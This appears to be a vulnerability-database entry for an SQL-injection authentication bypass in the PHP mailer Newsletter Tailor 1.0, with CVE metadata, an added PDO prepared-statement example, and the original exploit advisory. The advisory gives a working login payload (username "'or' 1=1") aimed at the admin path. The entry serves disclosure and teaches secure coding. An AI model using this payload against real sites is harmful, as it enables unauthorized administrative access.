Vendor: Newsletter Tailor
By: ViRuSMaN
CVSS: 9 (HIGH)
Auth Bypass SQL Injection
CWE: 89
Product Name: Newsletter Tailor
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CVE: CVE-2011-4010
CPE: a:virusman:newsletter_tailor
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability

Newsletter Tailor is vulnerable to authentication bypass through SQL injection because user-supplied input is not properly sanitized. A remote attacker can exploit this to bypass authentication and gain access to the application.

Mitigation:

Upgrade to the latest version of Newsletter Tailor
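
For anyone auditing similar PHP login code, the following added example contrasts string-built SQL with a PDO prepared statement and a hashed-password check. It is not Newsletter Tailor's code and not from the advisory author; the table, column and function names are assumptions, and the account is constructed sample data.

```php
<?php
// Added example. Table, column and function names are hypothetical; this is
// not Newsletter Tailor's code. In-memory SQLite via PDO keeps it offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');

// Constructed sample account.
$db->prepare('INSERT INTO admins (username, pass_hash) VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Weak pattern: input is spliced into the SQL text, so a quote character in
// $user ends the string literal and whatever follows is parsed as SQL.
function weak_login_sql(string $user, string $pass): string
{
    return "SELECT 1 FROM admins WHERE username = '$user' AND password = '$pass'";
}

// Hardened pattern: the statement text is fixed, the username travels as a
// bound parameter, and the password is checked against a stored hash in PHP.
function safe_login(PDO $db, string $user, string $pass): bool
{
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash('placeholder', PASSWORD_DEFAULT);
    }
    $stmt = $db->prepare('SELECT pass_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Unknown user: still verify against a dummy hash so both paths do the same work.
    $ok = password_verify($pass, $row === false ? $dummy : $row['pass_hash']);
    return $row !== false && $ok;
}

// Input strings as quoted in the advisory on this page.
$user = "'or' 1=1";
$pass = 'ViRuSMaN';

echo "weak SQL text: ", weak_login_sql($user, $pass), PHP_EOL;
echo "safe_login, advisory input: ";
var_dump(safe_login($db, $user, $pass));
echo "safe_login, valid account:  ";
var_dump(safe_login($db, 'admin', 'correct horse'));
```

Printing the weak statement shows the username's quote characters landing outside the string literal, which is the condition the bound parameter removes.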

Exploit-DB raw data:

==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability
==============================================================================

[»] Script: [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Site page: [ A powerful Newsletter/ Mass Mailer script with built-in ftp client and wysiwyg editor ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[»] http://[target].com/[path]/admin/
[~] Username:'or' 1=1
[~] Password:ViRuSMaN


Author: ViRuSMaN <-

###########################################################################